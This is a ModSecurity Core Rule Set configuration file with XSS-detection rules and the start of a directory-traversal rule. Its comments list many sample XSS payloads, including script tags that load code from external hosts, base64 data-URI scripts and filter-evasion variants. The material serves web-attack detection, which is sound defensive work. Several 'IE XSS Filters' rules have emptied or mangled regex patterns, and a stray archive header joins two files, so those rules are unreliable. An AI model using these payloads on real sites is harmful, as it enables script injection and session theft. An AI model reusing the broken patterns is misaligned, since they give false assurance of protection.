Attack',id:'958003',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecMarker END_XSS_CHECK # Detect tags that are the most common direct HTML injection points. # # <a href=javascript:... # <applet src="..." type=text/html> # <applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html> # <base href=javascript:... # <base href=... // change base URL to something else to exploit relative filename inclusion # <bgsound src=javascript:... # <body background=javascript:... # <body onload=... # <embed src=http://www.example.com/flash.swf allowScriptAccess=always # <embed src="data:image/svg+xml; # <frameset><frame src="javascript:..."></frameset> # <iframe src=javascript:... # <img src=x onerror=... # <input type=image src=javascript:... # <layer src=... # <link href="javascript:..." rel="stylesheet" type="text/css" # <link href="http://www.example.com/xss.css" rel="stylesheet" type="text/css" # <meta http-equiv="refresh" content="0;url=javascript:..." # <meta http-equiv="refresh" content="0;url=http://;javascript:..." // evasion # <meta http-equiv="link" rel=stylesheet content="http://www.example.com/xss.css"> # <meta http-equiv="Set-Cookie" content="NEW_COOKIE_VALUE"> # <object data=http://www.example.com # <object type=text/x-scriptlet data=... # <object type=application/x-shockwave-flash data=xss.swf> # <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:...></object> // not verified # <script>...</script> # <script src=http://www.example.com/xss.js></script> - TODO add another rule for this # <script src="data:text/javascript,alert(1)"></script> # <script src="data:text/javascript;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg=="></script> # <style>STYLE</style> # <style type=text/css>STYLE</style> # <style type=text/javascript>alert('xss')</style> # <table background=javascript:... # <td background=javascript: # # # NOTES # # - Reference the WASC Script Mapping Project - http://projects.webappsec.org/Script-Mapping # # - Not using closing brackets because they are not needed for the # attacks to succeed. The following seems to work in FF: <body/s/onload=... # # - Also, browsers sometimes tend to translate < into >, in order to "repair" # what they think was a mistake made by the programmer/template designer. # # - Browsers are flexible when it comes to what they accept as separator between # tag names and attributes. The following is commonly used in payloads: <img/src=... # A better example: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^=alert("XSS")> # # - Grave accents are sometimes used as an evasion technique (as a replacement for quotes), # but I don't believe we need to look for quotes anywhere. # # - Links do not have to be fully qualified. For example, the following works: # <script src="//ha.ckers.org/.j"> # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<(a|abbr|acronym|address|applet|area|audioscope|b|base|basefront|bdo|bgsound|big|blackface|blink|blockquote|body|bq|br|button|caption|center|cite|code|col|colgroup|comment|dd|del|dfn|dir|div|dl|dt|em|embed|fieldset|fn|font|form|frame|frameset|h1|head|hr|html|i|iframe|ilayer|img|input|ins|isindex|kdb|keygen|label|layer|legend|li|limittext|link|listing|map|marquee|menu|meta|multicol|nobr|noembed|noframes|noscript|nosmartquotes|object|ol|optgroup|option|p|param|plaintext|pre|q|rt|ruby|s|samp|script|select|server|shadow|sidebar|small|spacer|span|strike|strong|style|sub|sup|table|tbody|td|textarea|tfoot|th|thead|title|tr|tt|u|ul|var|wbr|xml|xmp)\W" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973300',capture,t:none,t:jsDecode,t:lowercase,block,msg:'Possible XSS Attack Detected - HTML Tag Handler',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\ballowscriptaccess\b|\brel\b\W*?=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973301',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # TODO Would evasion such as null and whitespace work here? # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* ".+application/x-shockwave-flash|image/svg\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973302',capture,t:none,t:htmlEntityDecode,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # Detect event handler names # # <body onload=...> # <img src=x onerror=...> # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bon(abort|blur|change|click|dblclick|dragdrop|error|focus|keydown|keypress|keyup|load|mousedown|mousemove|mouseout|mouseover|mouseup|move|readystatechange|reset|resize|select|submit|unload)\b\W*?=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973303',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # Detect usage of common URI attributes (e.g. src) # # <a href="javascript:...">Link</a> # <base href="javascript:..."> # <bgsound src="javascript:..."> # <body background="javascript:..."> # <frameset><frame src="javascript:..."></frameset> # <iframe src=javascript:...> # <img dynsrc=javascript:...> # <img lowsrc=javascript:...> # <img src=javascript:...> # <input type=image src=javascript:...> # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\b(background|dynsrc|href|lowsrc|src)\b\W*?=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973304',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # As above, but try to catch the other bit that is necessary to execute the attack. # # <meta http-equiv="refresh" content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> # <img src=jaVaScrIpt:...> # <img src=a;avascript:...> (not evasion) # <img src="jav ascript:..."> (embedded tab; null byte, other whitespace characters work too) # <img src="jaa ascript:..."> (the combination of the above two) # # NOTES # # - htmlEntityDecode needs to be applied because this content appears in HTML # attributes, so it's not evasion. # # TODO I think asfunction only work in HTML files handled by Flash. Needs verifying. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(asfunction|javascript|vbscript|data|mocha|livescript):" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973305',capture,t:none,t:htmlEntityDecode,t:lowercase,t:removeNulls,t:removeWhitespace,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # Detect attempts to use the style attribute, which works with any tag in at # least one major browser. # # <div style="background-image: url(javascript:...)"> # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bstyle\b\W*?=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973306',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # -- JavaScript fragments -- # # TODO Need more fragments. # # TODO What about JavaScript code hidden behind CSS? # # TODO There is a bunch of DOM-manipulation stuff that we want to cover here. # # alert(String.fromCharCode(88,83,83) # - window.name # - document.cookie # - document.location # - document.write # - document.styleSheets[0].addImport('yourstylesheet.css', 2); # - window.execScript("alert('test');", "JavaScript"); # - document.body.innerHTML = '' # - newObj = new ActiveXObject(servername.typename[, location]) # - A list of keywords here: http://technet.microsoft.com/en-gb/library/bb794749.aspx # - setTimeout("alert('xss')", 1000) # - xmlHttp.onreadystatechange=function() {} # - eval(location.hash.substr(1)) // used to execute JavaScript in fragment identifier # # NOTES: # # - JavaScript evasion: # # http://www.thespanner.co.uk/2007/09/19/javascript-for-hackers/ # http://www.thespanner.co.uk/2007/12/12/javascript-for-hackers-part-2/ # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(fromcharcode|alert|eval)\s*\(" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973307',capture,t:none,t:htmlEntityDecode,t:jsDecode,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # -- CSS attack fragments -- # <div style="background-image: url(javascript:...)"> # <div style="background-image: url(javascript:alert('XSS'))"> // not used # <div style="width: expression(...);"> # <img style="x:expression(document.write(1))"> # <xss style="behavior: url(http://ha.ckers.org/xss.htc);"> # - <style>li {list-style-image: url("javascript:alert('XSS')");}</style><ul><li>xss # <style>@import url(...);</style> # -moz-binding:url(...) # background:url("javascript:...") # </xss/*-*/style=xss:e/**/xpression(alert(1337))> (comment evasion) // TODO Verify # <style type="text/css">@i\m\p\o\rt url(...);</style> (css escaping evasion) # <li style="behavior:url(hilite.htc)">xss # # Interesting CSS injection: http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/ # # Ref: http://crawlmsdn.microsoft.com/en-us/library/ms531078(vs.85).aspx (DHTML Behaviors) # # Note: A lot of these seem to need to use the "javascript:" prefix to execute anything. Requiring # a match of that before we do anything might help us reduce the FP rate. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "background\b\W*?:\W*?url|background-image\b\W*?:|behavior\b\W*?:\W*?url|-moz-binding\b|@import\b|expression\b\W*?\(" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973308',capture,t:none,t:htmlEntityDecode,t:cssDecode,t:replaceComments,t:removeWhitespace,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # <C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C> // evasion SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<!\[cdata\[|\]\]>" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973309',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # -- Misc -- # alert('xss') # alert("xss") # alert(/xss/) # <xss> # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "[/'\"<]xss[/'\">]" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973310',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # String.fromCharCode(88,83,83) # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(88,83,83)" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973311',capture,t:none,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:lowercase,block,msg:'XSS Attack Detected',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # '';!--"<XSS>=&{()} # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "'';!--\"<xss>=&{()}" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973312',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:lowercase,block,msg:'XSS Attack Detected',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # Handle &{alert('xss')} which is supposed to work in Netscape 4. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "&{" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973313',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,block,msg:'XSS Attack Detected',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # <!DOCTYPE html [ # <!ENTITY inject "<script>alert(1)</script>"> # ]> # <html xmlns="http://www.w3.org/1999/xhtml"> # <head> # <title>Test # # # # &inject; # # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* ")" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973331',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:.*?((@[i\\\\])|(([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\\\]|(&#x?0*((40)|(28)|(92)|(5C));?)))))" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973315',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:])" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973318',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:)" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973329',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:])" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973328',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:[ /+\t\"\'`]style[ /+\t]*?=.*([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\\\]|(&#x?0*((40)|(28)|(92)|(5C));?)))" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973316',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:[ /+\t\"\'`]on\[a-z]\[a-z]\[a-z]+?[ +\t]*?=.)" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973325',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:[ /+\t\"\'`]datasrc[ +\t]*?=.)" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973319',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',t:none,t:htmlEntityDecode,t:compressWhiteSpace,block,msg:'IE XSS Filters - Attack Detected.',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_42_tight_security.conf000066400000000000000000000034031216457256400323700ustar00rootroot00000000000000# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset file contains rules that are highly prone to FPs # Enable PARANOID_MODE in the 10 config file if you want to activate this rule # # # Directory Traversal # SecRule REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer "(?i)(?:\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\.){2}(?:\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\/))" \ 